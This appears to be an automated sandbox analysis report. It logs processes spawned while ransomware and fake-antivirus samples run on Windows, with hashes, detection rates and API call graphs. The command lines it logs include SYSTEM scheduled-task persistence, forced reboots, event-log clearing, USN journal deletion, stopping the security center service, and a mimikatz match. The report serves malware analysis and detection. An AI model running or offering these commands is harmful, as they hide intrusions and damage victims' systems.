                                                                                                                                                    Imagebase:0xbb0000
                                                                                                                                                    File size:74752 bytes
                                                                                                                                                    MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:28
                                                                                                                                                    Start time:14:59:44
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:29
                                                                                                                                                    Start time:14:59:45
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 /s c:\windows\comctl32.ocx
                                                                                                                                                    Imagebase:0xc20000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:30
                                                                                                                                                    Start time:14:59:47
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                    File size:495616 bytes
                                                                                                                                                    MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                    • Detection: 69%, Metadefender, Browse

                                                                                                                                                    Target ID:31
                                                                                                                                                    Start time:14:59:47
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:32
                                                                                                                                                    Start time:14:59:49
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:33
                                                                                                                                                    Start time:14:59:49
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 /s c:\windows\mscomctl.ocx
                                                                                                                                                    Imagebase:0xc20000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:34
                                                                                                                                                    Start time:14:59:49
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                    Imagebase:0x890000
                                                                                                                                                    File size:185856 bytes
                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:35
                                                                                                                                                    Start time:14:59:49
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:195400 bytes
                                                                                                                                                    MD5 hash:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 70%, ReversingLabs
                                                                                                                                                    • Detection: 60%, Metadefender, Browse

                                                                                                                                                    Target ID:36
                                                                                                                                                    Start time:14:59:53
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:37
                                                                                                                                                    Start time:14:59:54
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                    Imagebase:0x10f0000
                                                                                                                                                    File size:82944 bytes
                                                                                                                                                    MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:38
                                                                                                                                                    Start time:14:59:54
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:39
                                                                                                                                                    Start time:14:59:54
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:40
                                                                                                                                                    Start time:14:59:54
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
                                                                                                                                                    Imagebase:0xc10000
                                                                                                                                                    File size:2007552 bytes
                                                                                                                                                    MD5 hash:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 37%, ReversingLabs
                                                                                                                                                    • Detection: 36%, Metadefender, Browse

                                                                                                                                                    Target ID:41
                                                                                                                                                    Start time:14:59:55
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
                                                                                                                                                    Imagebase:0x890000
                                                                                                                                                    File size:185856 bytes
                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:42
                                                                                                                                                    Start time:14:59:56
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                    Imagebase:0x10f0000
                                                                                                                                                    File size:82944 bytes
                                                                                                                                                    MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:43
                                                                                                                                                    Start time:14:59:56
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:44
                                                                                                                                                    Start time:14:59:58
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2277809790 && exit
                                                                                                                                                    Imagebase:0x7ff707bb0000
                                                                                                                                                    File size:273920 bytes
                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:45
                                                                                                                                                    Start time:14:59:58
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:46
                                                                                                                                                    Start time:14:59:59
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:47
                                                                                                                                                    Start time:14:59:59
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\586F.tmp
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\586F.tmp" \\.\pipe\{9D54B529-EEEC-45A5-9DC8-4D8B7F723465}
                                                                                                                                                    Imagebase:0x7ff769b10000
                                                                                                                                                    File size:62328 bytes
                                                                                                                                                    MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: mimikatz, Description: mimikatz, Source: 0000002F.00000000.420217130.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                    • Rule: mimikatz, Description: mimikatz, Source: 0000002F.00000000.419388930.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                    • Rule: mimikatz, Description: mimikatz, Source: 0000002F.00000002.430889816.00007FF769B1E000.00000004.00000001.01000000.0000001D.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                    • Rule: mimikatz, Description: mimikatz, Source: 0000002F.00000000.421202645.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                                                                    Target ID:48
                                                                                                                                                    Start time:15:00:00
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
                                                                                                                                                    Imagebase:0x890000
                                                                                                                                                    File size:185856 bytes
                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:49
                                                                                                                                                    Start time:15:00:00
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:50
                                                                                                                                                    Start time:15:00:02
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\antivirus-platinum.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:c:\windows\antivirus-platinum.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:9728 bytes
                                                                                                                                                    MD5 hash:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:Visual Basic

                                                                                                                                                    Target ID:51
                                                                                                                                                    Start time:15:00:27
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:52
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:attrib +h c:\windows\antivirus-platinum.exe
                                                                                                                                                    Imagebase:0x2e0000
                                                                                                                                                    File size:19456 bytes
                                                                                                                                                    MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:53
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                    Imagebase:0x7ff775540000
                                                                                                                                                    File size:455656 bytes
                                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:54
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\6AdwCleaner.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\6AdwCleaner.exe"
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:172648 bytes
                                                                                                                                                    MD5 hash:87E4959FEFEC297EBBF42DE79B5C88F6
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 60%, ReversingLabs
                                                                                                                                                    • Detection: 52%, Metadefender, Browse

                                                                                                                                                    Target ID:55
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:56
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:net stop wscsvc
                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                    File size:46592 bytes
                                                                                                                                                    MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:57
                                                                                                                                                    Start time:15:00:07
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                    File size:216064 bytes
                                                                                                                                                    MD5 hash:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 00000039.00000000.449968322.0000000000363000.00000002.00000001.01000000.00000026.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 00000039.00000000.448929209.0000000000352000.00000002.00000001.01000000.00000026.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                    • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 85%, ReversingLabs
                                                                                                                                                    • Detection: 60%, Metadefender, Browse

                                                                                                                                                    Target ID:58
                                                                                                                                                    Start time:15:00:08
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:18.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:6.5%
                                                                                                                                                      Total number of Nodes:1821
                                                                                                                                                      Total number of Limit Nodes:28
                                                                                                                                                      execution_graph 12167 40c78e 12168 40c798 12167->12168 12192 40bfe1 12167->12192 12216 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12168->12216 12169 40b613 ExpandEnvironmentStringsA 12169->12192 12171 40ca58 12172 40c7a5 12174 405767 3 API calls 12172->12174 12175 40c7fe 12172->12175 12173 40c021 lstrcmpiA 12173->12192 12185 40c84b 12174->12185 12176 40c8dc 12175->12176 12177 405822 GetFullPathNameA 12175->12177 12180 405822 GetFullPathNameA 12176->12180 12177->12176 12178 40c068 GetCurrentDirectoryA 12178->12192 12179 40c2fe SetWindowTextA 12179->12192 12182 40c8ef 12180->12182 12181 405767 3 API calls 12181->12185 12217 40aac2 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListA 12182->12217 12184 40b7ba 3 API calls 12184->12192 12185->12175 12185->12181 12186 40a224 4 API calls 12186->12192 12187 40c41e RegOpenKeyExA 12189 40c43a RegQueryValueExA RegCloseKey 12187->12189 12187->12192 12188 405bdd MultiByteToWideChar 12188->12192 12189->12192 12190 405fad 14 API calls 12190->12192 12191 40a205 ctype 2 API calls 12191->12192 12192->12169 12192->12171 12192->12173 12192->12178 12192->12179 12192->12184 12192->12186 12192->12187 12192->12188 12192->12190 12192->12191 12193 40b9b0 3 API calls 12192->12193 12195 405bca FindClose 12192->12195 12203 40c3ee SendMessageA 12192->12203 12214 40c0f0 ctype 12192->12214 12196 40c3af GetDlgItem SetWindowTextA SendMessageA 12193->12196 12194 40c0f5 SetFileAttributesA 12199 40c1bb GetFileAttributesA 12194->12199 12194->12214 12195->12192 12196->12192 12197 40c988 12204 4058ff 7 API calls 12197->12204 12198 40c8fe 12198->12197 12224 40a59a CompareStringA 12198->12224 12201 40c1c9 DeleteFileA 12199->12201 12199->12214 12201->12214 12202 405fad 14 API calls 12202->12214 12203->12192 12206 40c9ad 12204->12206 12205 40c1e6 wsprintfA GetFileAttributesA 12208 40c208 MoveFileA 12205->12208 12205->12214 12219 40a9bd OleInitialize CoCreateInstance 12206->12219 12207 407300 4 API calls 12207->12214 12208->12214 12210 40c9fc 12210->12192 12211 40ca05 SHChangeNotify 12210->12211 12211->12192 12212 406ea5 GetVersionExA 12212->12214 12213 40c229 MoveFileExA 12213->12214 12214->12192 12214->12194 12214->12199 12214->12202 12214->12205 12214->12207 12214->12212 12214->12213 12215 40c19a SHFileOperationA 12214->12215 12215->12199 12216->12172 12218 40aaf8 12217->12218 12218->12198 12220 40aab5 OleUninitialize 12219->12220 12221 40a9ef 12219->12221 12220->12210 12222 40aa72 MultiByteToWideChar 12221->12222 12223 40aa9d 12221->12223 12222->12223 12223->12220 12224->12197 11914 40a7d8 11919 40a6c0 11914->11919 11918 40a7e8 11920 40a6d5 11919->11920 11923 40a6e8 11920->11923 11959 40e4da 11920->11959 11922 40a763 11925 40d33c OleInitialize 11922->11925 11923->11922 11962 402c62 11923->11962 11926 40e428 2 API calls 11925->11926 11927 40d358 GetCommandLineA 11926->11927 11928 40d378 GetModuleFileNameA SetEnvironmentVariableA 11927->11928 11929 40d36a 11927->11929 11931 406ea5 GetVersionExA 11928->11931 12031 40b485 11929->12031 11933 40d397 11931->11933 11934 40d39b GetModuleFileNameW 11933->11934 11935 40d3ae 11933->11935 11936 40d3b6 GetModuleHandleA LoadIconA LoadBitmapA 11934->11936 11935->11936 12035 411585 LoadLibraryA LoadLibraryA #17 LoadLibraryA 11936->12035 11938 40d3ee 12040 4098e0 11938->12040 11940 40d3f9 11941 40aca1 3 API calls 11940->11941 11942 40d410 11941->11942 11943 40aca1 3 API calls 11942->11943 11944 40d41a DialogBoxParamA 11943->11944 12045 40648f 11944->12045 11947 40648f OleUninitialize 11948 40d462 11947->11948 12048 4115fd 11948->12048 11952 40d49a DeleteObject 11955 40d4b1 DeleteObject 11952->11955 11956 40d4b4 11952->11956 11953 40d477 ctype 11953->11952 11954 40a205 ctype 2 API calls 11953->11954 11954->11952 11955->11956 11957 40d4ec OleUninitialize ExitProcess 11956->11957 12053 40b6ea WaitForSingleObject 11956->12053 11966 40e428 GetCPInfo 11959->11966 11963 402c6a 11962->11963 11969 402ba2 11963->11969 11967 40e44c IsDBCSLeadByte 11966->11967 11967->11967 11968 40e464 11967->11968 11968->11923 11992 4029f3 11969->11992 11972 40a668 2 API calls 11973 402bd9 11972->11973 11974 402be5 11973->11974 12016 40dd32 11973->12016 11976 40a668 2 API calls 11974->11976 11977 402bf5 11976->11977 11978 402c01 11977->11978 11979 40dd32 2 API calls 11977->11979 11980 40a668 2 API calls 11978->11980 11979->11978 11981 402c11 11980->11981 11982 402c1d 11981->11982 11983 40dd32 2 API calls 11981->11983 11984 40a668 2 API calls 11982->11984 11983->11982 11985 402c2d 11984->11985 11986 402c39 11985->11986 11987 40dd32 2 API calls 11985->11987 11988 40a668 2 API calls 11986->11988 11987->11986 11989 402c49 11988->11989 11990 402c55 11989->11990 11991 40dd32 2 API calls 11989->11991 11990->11922 11991->11990 11993 402a05 11992->11993 12003 402a12 11992->12003 12019 40dbe7 11993->12019 11995 40dbe7 2 API calls 11997 402a24 11995->11997 12000 40a65b ctype 2 API calls 11997->12000 11998 40dbe7 2 API calls 12001 402a3c 11998->12001 12005 402a2a 12000->12005 12007 40a65b ctype 2 API calls 12001->12007 12002 40dbe7 2 API calls 12008 402a54 12002->12008 12003->11995 12003->12005 12004 40dbe7 2 API calls 12009 402a6e 12004->12009 12005->11998 12010 402a42 12005->12010 12006 402a74 12011 402bab 12006->12011 12014 40a205 ctype 2 API calls 12006->12014 12007->12010 12012 40a65b ctype 2 API calls 12008->12012 12013 40a65b ctype 2 API calls 12009->12013 12010->12002 12015 402a5a 12010->12015 12011->11972 12012->12015 12013->12006 12014->12011 12015->12004 12015->12006 12024 40dc02 12016->12024 12020 4012aa ctype 2 API calls 12019->12020 12021 40dbf2 12020->12021 12022 4012aa ctype 2 API calls 12021->12022 12023 40dbfa 12022->12023 12025 40dbcb 2 API calls 12024->12025 12026 40dc16 12025->12026 12027 40dbcb 2 API calls 12026->12027 12028 40dc1e 12027->12028 12029 40dbcb 2 API calls 12028->12029 12030 40dc26 12029->12030 12030->11974 12033 40b49a 12031->12033 12032 40b60c SetEnvironmentVariableA 12032->11928 12033->12032 12034 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 12033->12034 12034->12033 12036 4115ec SHGetMalloc 